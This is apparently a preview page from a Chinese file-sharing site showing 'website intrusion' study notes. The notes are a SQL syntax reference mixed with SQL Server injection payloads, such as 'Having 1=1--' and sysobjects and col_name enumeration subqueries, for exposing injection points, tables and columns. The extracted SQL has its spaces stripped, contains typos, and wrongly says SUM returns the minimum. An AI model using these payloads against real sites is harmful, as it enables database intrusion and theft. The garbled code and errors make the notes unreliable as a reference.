返回
网站入侵与脚本攻防修炼笔记

网站入侵与脚本攻防修炼笔记

ID:12743241

大小:37.50 KB

页数:4页

时间:2018-07-18

网站入侵与脚本攻防修炼笔记_第1页
网站入侵与脚本攻防修炼笔记_第2页
网站入侵与脚本攻防修炼笔记_第3页
网站入侵与脚本攻防修炼笔记_第4页
资源描述:

《网站入侵与脚本攻防修炼笔记》由会员上传分享,免费在线阅读,更多相关内容在行业资料-天天文库

1、Select:选取(查询列名)From:子句指定了select语句中字段的来源(表段)Where:查询条件(那个字段通常用于缩小搜索范围子句用于规定选择的标准。)WHERE关键字无法与合计函数一起使用。Like:在where下使用意思是字段中包含n%:N开头%N:结尾%N%:包含NNOTLIKE:不包含搜索项ORDERBY字段升(默认)ASC/降DESC(语句用于根据指定的列对结果集进行排序。)UNION操作符用于合并两个或多个SELECT语句的结果集。(相同的只显示一个)语法select字段fr

2、om表段[…….]unionselect字段from表段[…….]UNIONALL操作符用于合并两个或多个SELECT语句的结果集。(命令会列出所有的值)函数GROUPBY语句用于结合合计函数,根据一个或多个列对结果集进行分组。常常和SUM()“相加函数”使用分组相加例如:select字段1,SUM(字段2)from表段GREUPBY字段1“意思是把字段1分组然后把字段1分好的各组的字段2的值相加”HAVING子句必须和GROUPBY语句一起使用用于出GROUPBY结合后的值的内容通常用于缩小结合

3、后搜索范围例如:select字段1,SUM(字段2)from表段GREUPBY字段1HAVINGSUM(字段2)<>X“筛选出结合后字段2的值”Having1=1—爆注入点Groupby字段名Having1=1—爆字段爆字段(selecttop1字段from表段whereID=N)>1爆多表语句(selecttop1namefrom(selecttop[n第N个表]id,namefromsysobjectswherextype=char(85))Torderbyiddesc)>1爆多字段名(sel

4、ecttop1col_name(object_id([表名]),[第N个字段名])fromsysobjects)>1LEN()函数返回文本字段中值的长度。SUM()函数返回数值列的总数(总额)。如selectsum(字段)from表段“在标段中字段的重和”MID(列名,n,N)函数用于从文本字段中提取字符Access:asc(字符) SQLServer:unicode(字)作用:返回某字符的ASCII码COUNT(列名)函数返回指定列的值的数目Exist(任何东东)是否存在存在为真否则为假Exis

5、t(select*from表名)“查询是否存在这个表“Exist(select列名from正确的表名)“查询是否存在这个列“(Selectcount(列名)form正确的表名)>=1“判断表段里的列段数是否>=1查询是否存在这个列”(selecttopnlen(列名)from表名)>x数字型原型:select*from表名where字段=50(一个有注入点页面内部SQL代码)字符型原型:select*from表名where字段=’字符’搜索型原型:select*from表名where字段like‘

6、%关键字%’限制返回行:selecttopn[PERCENE]………(N代表返回行数如果加PERCENE代表%比)(1)数据记录筛选语句sql="select*from数据表where字段名=字段值orderby字段名[desc]"sql="select*from数据表where字段名like‘%字段值%’orderby字段名[desc]"sql="selecttop10*from数据表where字段名orderby字段名[desc]"sql="select*from数据表where字段名in(‘

7、值1’,’值2’,’值3’)”sql="select*from数据表where字段名between值1and值2”(2)更新数据记录语句Sql=update数据表set字段名=字段值where条件表达式”Sql=update数据表set字段1=值1,字段2=值2........字段N=值Nwhere条件表达式”(3)删除增加数据记录语句Sql=”deletefrom数据表where条件表达式”Sql=”deletefrom数据表”(将数据表所有记录删除)Sql=”insertinto表段value

8、s(字段1,字段2……)”Sql=”insertinto数据表(字段1,字段2,字段3,…..)values(值1,值2,值3,….)”Sql=”insertinto目标数据表select*from源数据表”(把源数据表的记录增加到目标数据表)(4)数据记录统计函数AVG(字段名)得出一个表格平均值COUNT(*

9、字段名)对数据行数的统计或对某一栏有值的数据行数统计MAZ(字段名)取得一个表格栏最大的值SUM(字段名)取得一个表格栏最小的值引用以上函数的方法:Sql=”select

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。